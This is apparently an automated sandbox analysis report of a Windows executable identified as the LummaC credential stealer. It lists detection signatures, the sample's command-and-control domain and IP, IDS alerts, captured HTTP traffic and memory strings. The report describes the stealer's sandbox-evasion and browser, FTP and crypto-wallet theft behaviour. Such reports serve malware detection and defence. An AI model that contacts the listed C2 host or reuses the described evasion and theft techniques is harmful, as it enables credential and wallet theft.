Edit tour

Windows Analysis Report
JqGBbm7.exe

Overview

General Information

Sample name:	JqGBbm7.exe
Analysis ID:	1629893
MD5:	30c1a6337089e68b975438caebc8f497
SHA1:	2cf2324672cf72b9bc1869633f3bf6904bb61011
SHA256:	db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
Tags:	176-113-115-7exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

JqGBbm7.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\JqGBbm7.exe" MD5: 30C1A6337089E68B975438CAEBC8F497)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://explorebieology.run/api", "Build Version": "1vJIvk--mix"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: JqGBbm7.exe PID: 7280	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: JqGBbm7.exe PID: 7280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: JqGBbm7.exe PID: 7280	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:09.073658+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.31.208	443	TCP
2025-03-05T09:14:10.196038+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.31.208	443	TCP
2025-03-05T09:14:11.400800+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.31.208	443	TCP
2025-03-05T09:14:13.016025+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.31.208	443	TCP
2025-03-05T09:14:14.404589+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.31.208	443	TCP
2025-03-05T09:14:16.201598+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.31.208	443	TCP
2025-03-05T09:14:17.725240+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.31.208	443	TCP
2025-03-05T09:14:19.835558+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.31.208	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:09.533603+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	104.21.31.208	443	TCP
2025-03-05T09:14:10.677834+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49734	104.21.31.208	443	TCP
2025-03-05T09:14:20.275524+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49740	104.21.31.208	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:09.533603+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49733	104.21.31.208	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:09.073658+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.31.208	443	TCP
2025-03-05T09:14:10.196038+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.31.208	443	TCP
2025-03-05T09:14:11.400800+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.31.208	443	TCP
2025-03-05T09:14:13.016025+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	104.21.31.208	443	TCP
2025-03-05T09:14:14.404589+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.21.31.208	443	TCP
2025-03-05T09:14:16.201598+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	104.21.31.208	443	TCP
2025-03-05T09:14:17.725240+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	104.21.31.208	443	TCP
2025-03-05T09:14:19.835558+0100	2060537	1	Domain Observed Used for C2 Detected	192.168.2.4	49740	104.21.31.208	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:08.569261+0100	2060536	1	Domain Observed Used for C2 Detected	192.168.2.4	56573	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:08.552721+0100	2060538	1	Domain Observed Used for C2 Detected	192.168.2.4	58036	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:16.711841+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.31.208	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:14:17.732437+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49739	104.21.31.208	443	TCP

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: explorebieology.run

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:14:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwZOFV9zTQ3%2BQTpnKiSI9XoZ65G2LSO67joJ0Xo2LPZjHOohStq4VSc8LYXqimAawSYGXi4Ia5Fd28aSZO3MYz2z5cyj%2BWXjqUbHskFeaL7rRx6LJkT07XiLJdrbXkngcROJzUDX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b8287d39783ee0-EWR

Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/
Source: JqGBbm7.exe, 00000000.00000003.1796904576.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/F9?~
Source: JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1700000000.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/api
Source: JqGBbm7.exe, 00000000.00000003.1796904576.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/api.
Source: JqGBbm7.exe, 00000000.00000003.1740924328.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1741545733.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1755652162.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1741244052.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1755833347.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1754789182.00000000056E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/api8aHE
Source: JqGBbm7.exe, 00000000.00000003.1711208127.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/apiE
Source: JqGBbm7.exe, 00000000.00000002.1808013073.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806416714.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/apis
Source: JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000002.1808063789.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/bu
Source: JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/bu9
Source: JqGBbm7.exe, 00000000.00000003.1796904576.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711208127.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/pi
Source: JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000002.1808063789.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run/t
Source: JqGBbm7.exe, 00000000.00000003.1740988621.00000000056E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run:443/api
Source: JqGBbm7.exe, 00000000.00000003.1759597062.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run:443/apiexplorebieology.run
Source: JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorebieology.run:443/apila
Source: JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: JqGBbm7.exe	Static PE information: section name:
Source: JqGBbm7.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A0A030	0_2_00A0A030
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009D607C	0_2_009D607C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A06170	0_2_00A06170
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009DC375	0_2_009DC375
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A06400	0_2_00A06400
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A0C5DA	0_2_00A0C5DA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A0E550	0_2_00A0E550
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A0F0C0	0_2_00A0F0C0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009D3183	0_2_009D3183
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009DB100	0_2_009DB100
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009F12E0	0_2_009F12E0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009CF3F0	0_2_009CF3F0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009CB990	0_2_009CB990
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009F7B25	0_2_009F7B25
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009EDD70	0_2_009EDD70
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009D1D60	0_2_009D1D60
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009DBFAA	0_2_009DBFAA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD00A9	0_2_00AD00A9
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AAC0AD	0_2_00AAC0AD
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD208B	0_2_00AD208B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AFC087	0_2_00AFC087
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A6E094	0_2_00A6E094
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094	0_2_00AC8094
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8C0E7	0_2_00A8C0E7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A620FA	0_2_00A620FA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD60C6	0_2_00AD60C6
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009E40E0	0_2_009E40E0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ADA02E	0_2_00ADA02E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8A020	0_2_00A8A020
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A08032	0_2_00A08032
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ABE036	0_2_00ABE036
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A64061	0_2_00A64061
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A36077	0_2_00A36077
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A32078	0_2_00A32078
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5004A	0_2_00A5004A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A94058	0_2_00A94058
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB01AC	0_2_00AB01AC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AE61A9	0_2_00AE61A9
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009F81B4	0_2_009F81B4
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A60197	0_2_00A60197
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ACC19B	0_2_00ACC19B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009CC1A0	0_2_009CC1A0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A70123	0_2_00A70123
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A3A12B	0_2_00A3A12B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5613C	0_2_00A5613C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7E160	0_2_00A7E160
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD4161	0_2_00AD4161
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5214D	0_2_00A5214D
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ACE2BA	0_2_00ACE2BA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ABA2B3	0_2_00ABA2B3
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009EA2B0	0_2_009EA2B0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC229E	0_2_00AC229E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A342E1	0_2_00A342E1
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A9C2F8	0_2_00A9C2F8
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ABC2D7	0_2_00ABC2D7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A922D7	0_2_00A922D7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AF422E	0_2_00AF422E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A44232	0_2_00A44232
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5820A	0_2_00A5820A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009D222B	0_2_009D222B
